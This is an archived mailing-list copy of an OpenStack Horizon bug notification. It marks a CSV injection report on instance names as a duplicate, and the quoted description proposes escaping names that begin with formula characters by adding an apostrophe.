← Back to team overview

yahoo-eng-team team mailing list archive

  1. yahoo-eng-team team
  2. Mailing list archive
  3. Message #84239

[Bug 1866614] Re: CSV Injection in instance edit form in the name field

  Thread PreviousDate PreviousThread Next 
*** This bug is a duplicate of bug 1842749 ***
    https://bugs.launchpad.net/bugs/1842749

Since there hasn't been an update to Jeremy's question, we are going to
mark this as a duplicate of bug 1842749 since this appears to be the
same issue.

** This bug has been marked a duplicate of bug 1842749
   CSV Injection Possible in Compute Usage History

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Dashboard (Horizon).
https://bugs.launchpad.net/bugs/1866614

Title:
  CSV Injection in instance edit form in the name field

Status in OpenStack Dashboard (Horizon):
  New
Status in OpenStack Security Advisory:
  Incomplete

Bug description:
  This is arguably more a problem with Excel or Libre Office or other
  software that indiscriminately executes code in a document it is
  opening, but since we can fix it easily on our side, I think it would
  make sense to do so.

  The gist of it is that it's possible to name an instance in such a
  way, that it results in a spreadsheet formula that will be executed
  when the exported CSV file with the list of instances is imported in a
  spreadsheet program. In case of Microsoft Excel that formula could
  potentially do anything, which is a Bad Thing™, but I don't think they
  will fix it ever, so it's on us to escape such data, so that it won't
  be interpreted as formulas.

  This escaping is apparently done by appending a single apostrophe to
  the field's data whenever that data begins with +, -, = or @
  characters. I'm attaching a patch that I think should do it.

To manage notifications about this bug go to:
https://bugs.launchpad.net/horizon/+bug/1866614/+subscriptions
  Thread PreviousDate PreviousThread Next